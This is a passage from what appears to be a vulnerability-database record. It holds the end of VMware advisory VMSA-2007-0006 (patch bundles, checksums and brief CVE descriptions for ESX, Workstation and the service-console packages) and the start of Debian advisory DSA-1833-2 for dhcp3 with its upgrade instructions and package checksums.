Bundle ESX-8258730\r\n http://www.vmware.com/support/vi3/doc/esx-8258730-patch.html\r\n md5sum a06d0e36e403b0fe6bc6fbc76220a86d\r\n\r\n VMware ESX 3.0.0 Download Patch Bundle ESX-4809553\r\n http://www.vmware.com/support/vi3/doc/esx-4809553-patch.html\r\n md5sum cd363526aab5fa6c45bf2509cb5ae500\r\n\r\n NOTE: ESX 3.0.0 is nearing its End-of-life &#40;10/05/2007&#41; users\r\n should upgrade to at least 3.0.1 and preferably the newest\r\n release available.\r\n\r\n VMware ESX 2.5.4 upgrade to patch 10 &#40;Build# 53326&#41;\r\n VMware ESX 2.5.3 upgrade to patch 13 &#40;Build# 52488&#41;\r\n VMware ESX 2.1.3 upgrade to patch 8 &#40;Build# 53228&#41;\r\n VMware ESX 2.0.2 upgrade to patch 8 &#40;Build# 52650&#41;\r\n\r\n NOTE: ESX 3.0.2 is not affected by this issue\r\n\r\n Hosted products\r\n ---------------\r\n VMware Workstation 6.0.0 upgrade to version 6.0.1 &#40;Build# 55017&#41;\r\n VMware Workstation 5.5.4 upgrade to version 5.5.5 &#40;Build# 56455&#41;\r\n VMware Player 2.0.0 upgrade to version 2.0.1 &#40;Build# 55017&#41;\r\n VMware Player 1.0.4 upgrade to version 1.0.5 &#40;Build# 56455&#41;\r\n VMware Server 1.0.3 upgrade to version 1.0.4 &#40;Build# 56528&#41;\r\n VMware ACE 2.0.0 upgrade to version 2.0.1 &#40;Build# 55017&#41;\r\n VMware ACE 1.0.3 upgrade to version 1.0.4 &#40;Build# 54075&#41;\r\n\r\nII Hosted products DHCP security vulnerabilities addressed\r\n\r\n This release fixes several vulnerabilities in the DHCP server\r\n that could enable a specially crafted packets to gain system-level\r\n privileges. &#40;CVE-2007-0061, CVE-2007-0062, CVE-2007-0063&#41;\r\n\r\n Thanks to Neel Mehta and Ryan Smith of the IBM Internet Security\r\n Systems X-Force for discovering and researching these\r\n vulnerabilities.\r\n\r\n Hosted products\r\n ---------------\r\n VMware Workstation 6.0.0 upgrade to version 6.0.1 &#40;Build# 55017&#41;\r\n VMware Workstation 5.5.4 upgrade to version 5.5.5 &#40;Build# 56455&#41;\r\n VMware Player 2.0.0 upgrade to version 2.0.1 &#40;Build# 55017&#41;\r\n VMware Player 1.0.4 upgrade to version 1.0.5 &#40;Build# 56455&#41;\r\n VMware Server 1.0.3 upgrade to version 1.0.4 &#40;Build# 56528&#41;\r\n VMware ACE 2.0.0 upgrade to version 2.0.1 &#40;Build# 55017&#41;\r\n VMware ACE 1.0.3 upgrade to version 1.0.4 &#40;Build# 54075&#41;\r\n\r\nIII Windows based hosted product vulnerability in\r\n IntraProcessLogging.dll and vielib.dll.\r\n\r\n This release fixes a security vulnerability that could allow a\r\n malicious remote user to exploit the library file\r\n IntraProcessLogging.dll to overwrite files in a system.\r\n &#40;CVE-2007-4059&#41;\r\n\r\n This release fixes a security vulnerability that could allow a\r\n malicious remote user to exploit the library file vielib.dll to\r\n overwrite files in a system. &#40;CVE-2007-4155&#41;\r\n\r\n Thanks to the Goodfellas Security Research Team for discovering and\r\n researching these vulnerabilities.\r\n\r\n Hosted products\r\n ---------------\r\n VMware Workstation 6.0.0 upgrade to version 6.0.1 &#40;Build# 55017&#41;\r\n VMware Workstation 5.5.4 upgrade to version 5.5.5 &#40;Build# 56455&#41;\r\n VMware Player 2.0.0 upgrade to version 2.0.1 &#40;Build# 55017&#41;\r\n VMware Player 1.0.4 upgrade to version 1.0.5 &#40;Build# 56455&#41;\r\n VMware Server 1.0.3 upgrade to version 1.0.4 &#40;Build# 56528&#41;\r\n VMware ACE 2.0.0 upgrade to version 2.0.1 &#40;Build# 55017&#41;\r\n VMware ACE 1.0.3 upgrade to version 1.0.4 &#40;Build# 54075&#41;\r\n\r\n\r\nIV Escalation of privileges on Windows hosted systems\r\n\r\n This release fixes a security vulnerability in which Workstation\r\n was starting registered Windows services in an insecure manner.\r\n This vulnerability could allow a malicious user to escalate user\r\n privileges.\r\n\r\n Thanks to Foundstone for discovering this vulnerability.\r\n\r\n Hosted products\r\n ---------------\r\n VMware Workstation 6.0.0 upgrade to version 6.0.1 &#40;Build# 55017&#41;\r\n VMware Workstation 5.5.4 upgrade to version 5.5.5 &#40;Build# 56455&#41;\r\n VMware Player 2.0.0 upgrade to version 2.0.1 &#40;Build# 55017&#41;\r\n VMware Player 1.0.4 upgrade to version 1.0.5 &#40;Build# 56455&#41;\r\n VMware Server 1.0.3 upgrade to version 1.0.4 &#40;Build# 56528&#41;\r\n VMware ACE 2.0.0 upgrade to version 2.0.1 &#40;Build# 55017&#41;\r\n VMware ACE 1.0.3 upgrade to version 1.0.4 &#40;Build# 54075&#41;\r\n\r\nV Potential denial of service using VMware Player\r\n\r\n This release fixes a problem that prevented VMware Player from\r\n launching. This problem was accompanied by the error message VMware\r\n Player unrecoverable error: &#40;player&#41; Exception 0xc0000005 &#40;access\r\n violation&#41; has occurred.\r\n\r\n Hosted products\r\n ---------------\r\n VMware Player 2.0.0 upgrade to version 2.0.1 &#40;Build# 55017&#41;\r\n VMware Player 1.0.4 upgrade to version 1.0.5 &#40;Build# 56455&#41;\r\n\r\nVI ESX Service Console updates\r\n\r\na. Service console package Samba, has been updated to address the\r\n following issues:\r\n\r\n Various bugs were found in NDR parsing, used to decode MS-RPC\r\n requests in Samba. A remote attacker could have sent carefully\r\n crafted requests causing a heap overflow, which may have led to the\r\n ability to execute arbitrary code on the server. &#40;CVE-2007-2446&#41;\r\n\r\n Unescaped user input parameters were being passed as arguments to\r\n /bin/sh. A remote, authenticated, user could have triggered this\r\n flaw and executed arbitrary code on the server. Additionally, this\r\n flaw could be triggered by a remote unauthenticated user if Samba\r\n was configured to use the non-default username map script option.\r\n &#40;CVE-2007-2447&#41;\r\n\r\n Thanks to the Samba developers, TippingPoint, and iDefense for\r\n identifying and reporting these issues.\r\n\r\n Note: These issues only affect the service console network, and are\r\n not remote vulnerabilities for ESX Server hosts that have been set\r\n up with the security best practices provided by VMware.\r\n http://www.vmware.com/resources/techresources/726\r\n\r\n ESX\r\n ---\r\n VMware ESX 3.0.1 Download Patch Bundle ESX-1001213\r\n http://www.vmware.com/support/vi3/doc/esx-1001213-patch.html\r\n md5sum 4e942e5b47f90654696910fb8b10b144\r\n\r\n VMware ESX 3.0.0 Download Patch Bundle ESX-1001204\r\n http://www.vmware.com/support/vi3/doc/esx-1001204-patch.html\r\n md5sum 08bfdec038ea900c72f04e8d50b2db62\r\n\r\n NOTE: ESX 3.0.0 is nearing its End-of-life &#40;10/05/2007&#41; users\r\n should upgrade to at least 3.0.1 and preferably the newest\r\n release available\r\n\r\n VMware ESX 2.5.4 prior to upgrade patch 10 &#40;Build# 53326&#41;\r\n VMware ESX 2.5.3 prior to upgrade patch 13 &#40;Build# 52488&#41;\r\n VMware ESX 2.1.3 prior to upgrade patch 8 &#40;Build# 53228&#41;\r\n VMware ESX 2.0.2 prior to upgrade patch 8 &#40;Build# 52650&#41;\r\n\r\n NOTE: ESX 3.0.2 is not affected by this issue\r\n\r\nb. Updated bind package for the service console fixes a flaw with the\r\n way ISC BIND processed certain DNS query responses.\r\n\r\n ISC BIND &#40;Berkeley Internet Name Domain&#41; is an implementation of\r\n the DNS &#40;Domain Name System&#41; protocols. Under some circumstances, a\r\n malicious remote user could launch a Denial-of-Service attack on\r\n ESX Server hosts that had enabled DNSSEC validation.\r\n &#40;CVE-2007-0494&#41;\r\n\r\n Note: These issues only affect the service console network, and are\r\n not remote vulnerabilities for ESX Server hosts that have been set\r\n up with the security best practices provided by VMware.\r\n http://www.vmware.com/resources/techresources/726\r\n\r\n ESX\r\n ---\r\n VMware ESX 3.0.2 Download Patch Bundle ESX-1001725\r\n http://www.vmware.com/support/vi3/doc/esx-1001725-patch.html\r\n md5sum 75aa49eecec2e84eb41a4c26683d4c7a\r\n\r\n VMware ESX 3.0.1 Download Patch Bundle ESX-1001691\r\n http://www.vmware.com/support/vi3/doc/esx-1001691-patch.html\r\n md5sum e288a71c4953aa6724ce53879c663f81\r\n\r\n VMware ESX 3.0.0 Download Patch Bundle ESX-1001206\r\n http://www.vmware.com/support/vi3/doc/esx-1001206-patch.html\r\n md5sum bd552eb70624164067039525941ce82a\r\n\r\n NOTE: ESX 3.0.0 is nearing its End-of-life &#40;10/05/2007&#41; users\r\n should upgrade to at least 3.0.1 and preferably the newest\r\n release available\r\n\r\n VMware ESX 2.5.4 prior to upgrade patch 10 &#40;Build# 53326&#41;\r\n VMware ESX 2.5.3 prior to upgrade patch 13 &#40;Build# 52488&#41;\r\n VMware ESX 2.1.3 prior to upgrade patch 8 &#40;Build# 53228&#41;\r\n VMware ESX 2.0.2 prior to upgrade patch 8 &#40;Build# 52650&#41;\r\n\r\nc. This patch provides updated service console package krb5 update.\r\n\r\n The Common Vulnerabilities and Exposures project &#40;cve.mitre.org&#41;\r\n assigned the names CVE-2007-2442, CVE-2007-2443, and CVE-2007-2798\r\n to these security issues.\r\n\r\n Thanks to Wei Wang of McAfee Avert Labs discovered these\r\n vulnerabilities.\r\n\r\n Note: The VMware service console does not provide the kadmind\r\n binary, and is not affected by these issues, but a update has been\r\n provided for completeness.\r\n\r\n ESX\r\n ---\r\n VMware ESX 3.0.2 Download Patch Bundle ESX-1001731\r\n http://www.vmware.com/support/vi3/doc/esx-1001731-patch.html\r\n md5sum c349b83065f5b06cee34bae90a5a01b3\r\n\r\n VMware ESX 3.0.1 Download Patch Bundle ESX-1001723\r\n http://www.vmware.com/support/vi3/doc/esx-1001723-patch.html\r\n md5sum 9a31d1718d6c063cf978305b84637c40\r\n\r\n VMware ESX 3.0.0 Download Patch Bundle ESX-1001212\r\n http://www.vmware.com/support/vi3/doc/esx-1001212-patch.html\r\n md5sum 2bc08369d3410fa59d353e45830ae9f5\r\n\r\n NOTE: ESX 3.0.0 is nearing its End-of-life &#40;10/05/2007&#41; users\r\n should upgrade to at least 3.0.1 and preferably the newest\r\n release available\r\n\r\n VMware ESX 2.5.4 prior to upgrade patch 10 &#40;Build# 53326&#41;\r\n VMware ESX 2.5.3 prior to upgrade patch 13 &#40;Build# 52488&#41;\r\n VMware ESX 2.1.3 prior to upgrade patch 8 &#40;Build# 53228&#41;\r\n VMware ESX 2.0.2 prior to upgrade patch 8 &#40;Build# 52650&#41;\r\n\r\nd. Service console update for vixie-cron\r\n\r\n This patch provides an updated service console package vixie-cron.\r\n Cron is a standard UNIX daemon that runs specified programs at\r\n scheduled times.\r\n\r\n A denial of service issue was found in the way vixie-cron verified\r\n crontab file integrity. A local user with the ability to create a\r\n hardlink to /etc/crontab could potentially prevent vixie-cron from\r\n executing certain system cron jobs. &#40;CVE-2007-1856&#41;\r\n\r\n Thanks to Raphael Marichez for identifying this issue.\r\n\r\n ESX\r\n ---\r\n VMware ESX 3.0.1 Download Patch Bundle ESX-1001214\r\n http://www.vmware.com/support/vi3/doc/esx-1001214-patch.html\r\n md5sum 1e63db1cc7605830b16306a35bccd878\r\n\r\n VMware ESX 3.0.0 Download Patch Bundle ESX-1001205\r\n http://www.vmware.com/support/vi3/doc/esx-1001205-patch.html\r\n md5sum e6b818cf885d5fd5f93d33b27051df83\r\n\r\n NOTE: ESX 3.0.0 is nearing its End-of-life &#40;10/05/2007&#41; users\r\n should upgrade to at least 3.0.1 and preferably the newest\r\n release available\r\n\r\n NOTE: ESX 3.0.2 and ESX 2.x are not affected by this issue.\r\n\r\ne. Service console update for shadow-utils\r\n\r\n This patch provides an updated shadow-utils package. A new\r\n user&#39;s mailbox, when created, could have random permissions for a\r\n short period. This could enable a local malicious user to\r\n read or modify the mailbox. &#40;CVE-2006-1174&#41;\r\n\r\n ESX\r\n ---\r\n VMware ESX 3.0.2 Download Patch Bundle ESX-1001726\r\n http://www.vmware.com/support/vi3/doc/esx-1001726-patch.html\r\n md5sum ac55c65ddc2142a292648765e9dcb583\r\n\r\n VMware ESX 3.0.1 Download Patch Bundle ESX-1001692\r\n http://www.vmware.com/support/vi3/doc/esx-1001692-patch.html\r\n md5sum 27edbac467107cc1fe6c78a839ce2144\r\n\r\n VMware ESX 3.0.0 Download Patch Bundle ESX-1001207\r\n http://www.vmware.com/support/vi3/doc/esx-1001207-patch.html\r\n md5sum acad9bce49ac9398ab1ee502980b49cb\r\n\r\n NOTE: ESX 3.0.0 is nearing its End-of-life &#40;10/05/2007&#41; users\r\n should upgrade to at least 3.0.1 and preferably the newest\r\n release available\r\n\r\nf. Service console update for OpenLDAP\r\n\r\n This patch provides a updated OpenLDAP package. A flaw could\r\n allow users with selfwrite access to modify the distinguished\r\n name of any user, instead of being limited to modify only\r\n their own distinguished name. &#40;CVE-2006-4600&#41;\r\n\r\n ESX\r\n ---\r\n VMware ESX 3.0.2 Download Patch Bundle ESX-1001727\r\n http://www.vmware.com/support/vi3/doc/esx-1001727-patch.html\r\n md5sum bd137cbf65b20dae3aaf422a559f92a1\r\n\r\n VMware ESX 3.0.1 Download Patch Bundle ESX-1001693\r\n http://www.vmware.com/support/vi3/doc/esx-1001693-patch.html\r\n md5sum a11191b59761b6afb68ea73e9e6456d0\r\n\r\n VMware ESX 3.0.0 Download Patch Bundle ESX-1001208\r\n http://www.vmware.com/support/vi3/doc/esx-1001208-patch.html\r\n md5sum f3e26b66682191e024a9b094a063837f\r\n\r\n NOTE: ESX 3.0.0 is nearing its End-of-life &#40;10/05/2007&#41; users\r\n should upgrade to at least 3.0.1 and preferably the newest\r\n release available\r\n\r\n NOTE: ESX 2.x doesen&#39;t ship OpenLDAP\r\n\r\ng. Service console update for PAM\r\n\r\n This patch provides an updated PAM package A vulnerability was\r\n found that could allow console users with access to certain device\r\n files to cause damage to recordable CD drives. Certain file\r\n permissions have now been modified to disallow access.\r\n &#40;CVE-2004-0813&#41;\r\n\r\n A flaw was found with console device permissions. It was possible\r\n for various console devices to retain ownership of the previoius\r\n console user after logging out, which could result in leakage of\r\n information to an unauthorized user. &#40;CVE-2007-1716&#41;\r\n\r\n ESX\r\n ---\r\n VMware ESX 3.0.2 Download Patch Bundle ESX-1001728\r\n http://www.vmware.com/support/vi3/doc/esx-1001728-patch.html\r\n md5sum a33f0cc5b1cfc68683c4d8643c52775c\r\n\r\n VMware ESX 3.0.1 Download Patch Bundle ESX-1001694\r\n http://www.vmware.com/support/vi3/doc/esx-1001694-patch.html\r\n md5sum 6ce5d882d6fe9e714ce48f719cefb182\r\n\r\n VMware ESX 3.0.0 Download Patch Bundle ESX-1001209\r\n http://www.vmware.com/support/vi3/doc/esx-1001209-patch.html\r\n md5sum 1c7adad00a20f9e7ba1fbe1663ad4d66\r\n\r\n NOTE: ESX 3.0.0 is nearing its End-of-life &#40;10/05/2007&#41; users\r\n should upgrade to at least 3.0.1 and preferably the newest\r\n release available\r\n\r\nh. Service console update for GCC\r\n\r\n This patch provides security fixes for the service console GNU\r\n Compiler Collection &#40;GCC&#41; packages that include C, C++, Java,\r\n Fortran 77, Objective C, and Ada 95 GNU compilers and related\r\n support libraries.\r\n\r\n A flaw was found in the fastjar utility that could potentially\r\n allow a malicious user to create a JAR file which, if unpacked\r\n using fastjar, could write to any file that an authorized user had\r\n write access to. &#40;CVE-2006-3619&#41;\r\n\r\n Thanks to J&#252;rgen Weigert for identifying this issue.\r\n\r\n ESX\r\n ---\r\n VMware ESX 3.0.2 Download Patch Bundle ESX-1001729\r\n http://www.vmware.com/support/vi3/doc/esx-1001729-patch.html\r\n md5sum 1b2d32dc805971703bb2c8c047c6144a\r\n\r\n VMware ESX 3.0.1 Download Patch Bundle ESX-8253547\r\n http://www.vmware.com/support/vi3/doc/esx-8253547-patch.html\r\n md5sum 90702b54fb6197a6680f141ad8c435fa\r\n\r\n VMware ESX 3.0.0 Download Patch Bundle ESX-1001210\r\n http://www.vmware.com/support/vi3/doc/esx-1001210-patch.html\r\n md5sum c1fb76ac529966bf65cc98cc5e5e88bb\r\n\r\n NOTE: ESX 3.0.0 is nearing its End-of-life &#40;10/05/2007&#41; users\r\n should upgrade to at least 3.0.1 and preferably the newest\r\n release available\r\n\r\ni. Service Console update for GDB\r\n\r\n This patch provides a security fix for the service console GNU\r\n debugger &#40;GDB&#41;. Various vulnerabilities were found in GDB. These\r\n vulnerabilities may allow a malicious user to deceive a user into\r\n loading debugging information into GDB, enabling the execution of\r\n arbitrary code with the privileges of the user. &#40;CVE-2006-4146&#41;\r\n\r\n ESX\r\n ---\r\n VMware ESX 3.0.2 Download Patch Bundle ESX-1001730\r\n http://www.vmware.com/support/vi3/doc/esx-1001730-patch.html\r\n md5sum 7f91450c665065c9998a635bbe4c42db\r\n\r\n VMware ESX 3.0.1 Download Patch Bundle ESX-8567382\r\n http://www.vmware.com/support/vi3/doc/esx-8567382-patch.html\r\n md5sum 230a7c7ceec8bd581110ef9303a480fc\r\n\r\n VMware ESX 3.0.0 Download Patch Bundle ESX-1001211\r\n http://www.vmware.com/support/vi3/doc/esx-1001211-patch.html\r\n md5sum 3f30f6a1a28e6ff4c10d5e44864d327e\r\n\r\n NOTE: ESX 3.0.0 is nearing its End-of-life &#40;10/05/2007&#41; users\r\n should upgrade to at least 3.0.1 and preferably the newest\r\n release available\r\n\r\n4. Solution:\r\n\r\nPlease review the Patch notes for your product and version and verify\r\nthe md5sum of your downloaded file.\r\n\r\n ESX 3.0.1, ESX 3.0.0 patches and md5sums are listed in the\r\n above sections\r\n\r\n ESX 2.5.4\r\n http://www.vmware.com/support/esx25/doc/esx-254-200708-patch.html\r\n md5sum 8f29f906e0f3c8605a203f914f36b3d1\r\n\r\n ESX 2.5.3\r\n http://www.vmware.com/support/esx25/doc/esx-253-200708-patch.html\r\n md5sum 32ba19deb7af268ab357710145f8659b\r\n\r\n NOTE: ESX 2.5.3 is nearing its End-of-life &#40;10/05/2007&#41; users\r\n should upgrade to at least 2.5.4 and preferably the newest\r\n release available.\r\n\r\n ESX 2.1.3\r\n http://www.vmware.com/support/esx21/doc/esx-213-200708-patch.html\r\n md5sum 32f9f87a99c5c801dd61492a9d91dfe2\r\n\r\n NOTE: ESX 2.1.3 is nearing its End-of-life &#40;12/15/2007&#41; users\r\n should upgrade to at least 2.5.4 and preferably the newest\r\n release available.\r\n\r\n ESX 2.0.2\r\n http://www.vmware.com/support/esx2/doc/esx-202-200708-patch.html\r\n md5sum f36bb75b51f79e4ba2a2f01a71c3bb08\r\n\r\n NOTE: ESX 2.0.2 is nearning its End-of-life &#40;12/15/2007&#41; users\r\n should upgrade to at least 2.5.4 and preferably the newest\r\n release available.\r\n\r\n Workstation 6.0.1\r\n -----------------\r\n http://www.vmware.com/download/ws/\r\n\r\n Windows release notes:\r\n http://www.vmware.com/support/ws6/doc/releasenotes_ws6.html\r\n Linux release notes:\r\n http://www.vmware.com/support/ws6/doc/releasenotes_ws6.html\r\n\r\n Workstation 5.5.5\r\n -----------------\r\n http://www.vmware.com/download/ws/ws5.html\r\n\r\n Windows release notes:\r\n http://www.vmware.com/support/ws55/doc/releasenotes_ws55.html\r\n Linux release notes:\r\n http://www.vmware.com/support/ws55/doc/releasenotes_ws55.html\r\n\r\n Server 1.0.4\r\n ------------\r\n http://www.vmware.com/download/server/\r\n Release notes:\r\n http://www.vmware.com/support/server/doc/releasenotes_server.html\r\n\r\n ACE 2.0.1 and 1.0.4\r\n -------------------\r\n http://www.vmware.com/download/ace/\r\n\r\n Windows Release notes:\r\n http://www.vmware.com/support/ace2/doc/releasenotes_ace2.html\r\n\r\n Player 2.0.1 and 1.0.5\r\n ----------------------\r\n http://www.vmware.com/download/player/\r\n\r\n Release notes Player 1.x:\r\n http://www.vmware.com/support/player/doc/releasenotes_player.html\r\n Release notes Player 2.0\r\n http://www.vmware.com/support/player2/doc/releasenotes_player2.html\r\n\r\n5. References:\r\n\r\n CVE numbers\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2446\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2447\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0494\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2442\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2443\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2798\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0061\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0062\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0063\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4059\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4155\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4496\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4497\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1856\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1174\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4600\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0813\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1716\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3619\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4146\r\n\r\n\r\n- - -------------------------------------------------------------------\r\n6. Contact:\r\n\r\nE-mail list for product security notifications and announcements:\r\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\r\n\r\nThis Security Advisory is posted to the following lists:\r\n\r\n * security-announce@lists.vmware.com\r\n * bugtraq@securityfocus.com\r\n * full-disclosure@lists.grok.org.uk\r\n\r\nE-mail: security@vmware.com\r\n\r\nhttp://www.vmware.com/security\r\n\r\nVMware Security Response Policy\r\nhttp://www.vmware.com/vmtn/technology/security/security_response.html\r\n\r\nGeneral Support Lifecycle Policy\r\nhttp://www.vmware.com/support/policies/eos.html\r\n\r\nVMware Infrastructure Support Life Cycle Policy\r\nhttp://www.vmware.com/support/policies/eos_vi.html\r\n\r\nCopyright 2007 VMware Inc. All rights reserved.\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.7 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFG8depS2KysvBH1xkRCLHoAJ9sJyVIqG7nGjbLlCo1d7ogan7SQwCcC6Wj\r\nng+NNXJenc6G4YXR0xce8U4=\r\n=ElrO\r\n-----END PGP SIGNATURE-----", "cvss3": {}, "published": "2007-09-21T00:00:00", "type": "securityvulns", "title": "VMSA-2007-0006 Critical security updates for all supported versions of VMware ESX Server, VMware Server, VMware Workstation, VMware ACE, and VMware Player", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2007-4155", "CVE-2007-0494", "CVE-2007-1856", "CVE-2007-2442", "CVE-2007-2798", "CVE-2007-0062", "CVE-2007-2446", "CVE-2006-3619", "CVE-2007-4059", "CVE-2007-4497", "CVE-2007-4496", "CVE-2006-4146", "CVE-2007-2447", "CVE-2007-0063", "CVE-2004-0813", "CVE-2006-4600", "CVE-2006-1174", "CVE-2007-1716", "CVE-2007-2443", "CVE-2007-0061"], "modified": "2007-09-21T00:00:00", "id": "SECURITYVULNS:DOC:18039", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18039", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2023-12-07T12:58:59", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1833-2 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nAugust 25, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : dhcp3\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2009-0692 CVE-2009-1892\nCERT advisory : VU#410676\n\nThe previous dhcp3 update (DSA-1833-1) did not properly apply the\nrequired changes to the stable (lenny) version. The old stable (etch)\nversion is not affected by this problem.\n\nThe original advisory description follows.\n\nSeveral remote vulnerabilities have been discovered in ISC&#x27;s DHCP\nimplementation:\n\nIt was discovered that dhclient does not properly handle overlong\nsubnet mask options, leading to a stack-based buffer overflow and\npossible arbitrary code execution. (CVE-2009-0692)\n\nChristoph Biedl discovered that the DHCP server may terminate when\nreceiving certain well-formed DHCP requests, provided that the server\nconfiguration mixes host definitions using &quot;dhcp-client-identifier&quot;\nand &quot;hardware ethernet&quot;. This vulnerability only affects the lenny\nversions of dhcp3-server and dhcp3-server-ldap. (CVE-2009-1892)\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 3.1.1-6+lenny3.\n\nWe recommend that you upgrade your dhcp3 packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.1.1.orig.tar.gz\n Size/MD5 checksum: 798228 fcc19330a9c3a0efb5620409214652a9\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.1.1-6+lenny3.dsc\n Size/MD5 checksum: 1488 b884753ce46061cc6e0e6a783d7c24a3\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.1.1-6+lenny3.diff.gz\n Size/MD5 checksum: 128921 178f7799fbe3e8fb5a0472a8060bebf7\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp-client_3.1.1-6+lenny3_all.deb\n Size/MD5 checksum: 23010 e772483a84fdca84407e39556188a13e\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_alpha.deb\n Size/MD5 checksum: 148302 296381030181bf29e5185823472c34c7\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_alpha.deb\n Size/MD5 checksum: 348542 910f44119d0cbcefdfdb0496b72f75c0\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_alpha.deb\n Size/MD5 checksum: 272004 63e37fc50ae798ad86713ff354f5b996\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_alpha.deb\n Size/MD5 checksum: 394460 a77802ce027f350aed83be710c92fa9f\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_alpha.udeb\n Size/MD5 checksum: 215132 ea9207b439e373b7cda0633600fc2a66\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_alpha.deb\n Size/MD5 checksum: 127514 f1287179244c1684b1a892c187624425\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_alpha.deb\n Size/MD5 checksum: 333782 713d3ad0235144a0537d747a66766b6a\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_amd64.deb\n Size/MD5 checksum: 310356 6fb09a20cce949a6edd1a9a628863a2d\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_amd64.deb\n Size/MD5 checksum: 114266 bb511a3be6b474ba6233a00bd70d52b3\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_amd64.udeb\n Size/MD5 checksum: 188422 f2aaca0e2a93c0b3647d6cebc2dc515e\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_amd64.deb\n Size/MD5 checksum: 358418 15b92a206a5f782b91ef21a1cb89d8c1\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_amd64.deb\n Size/MD5 checksum: 245246 22f8d4e550561f67ac9145e114281d30\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_amd64.deb\n Size/MD5 checksum: 313224 2033f60c749a3e71631a5b153a77ae27\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_amd64.deb\n Size/MD5 checksum: 120442 f86b93961879963e2ea5dc0c5f2d344c\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_arm.deb\n Size/MD5 checksum: 226592 ddba5071d36b331c5a001b67a1b94410\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_arm.deb\n Size/MD5 checksum: 291194 4673741acf27ce06150203ea2cfde77f\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_arm.deb\n Size/MD5 checksum: 103716 cfa5568781f496e02e490ad803b79acc\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_arm.deb\n Size/MD5 checksum: 336408 56415a0df425eace6189f47585a63c01\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_arm.deb\n Size/MD5 checksum: 108910 efb3c5019520090a189212af9b6dcf3d\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_arm.deb\n Size/MD5 checksum: 292858 